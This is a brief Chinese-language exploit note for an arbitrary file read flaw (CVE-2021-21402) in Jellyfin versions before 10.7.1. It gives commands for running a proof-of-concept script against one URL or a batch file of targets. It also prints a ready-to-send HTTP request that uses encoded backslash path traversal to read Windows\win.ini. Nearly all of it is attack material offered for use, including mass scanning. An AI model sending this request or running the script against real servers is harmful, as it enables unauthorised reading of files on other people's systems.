任意文件读取漏洞(CVE 2021 21402)
影响范围¶
Jellyfin < 10.7.1
POC¶
#单个url测试
python3 CVE-2021-21402.py -u http://127.0.0.1:1111
#批量检测
python3 CVE-2021-21402.py -f url.txt
EXP¶
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream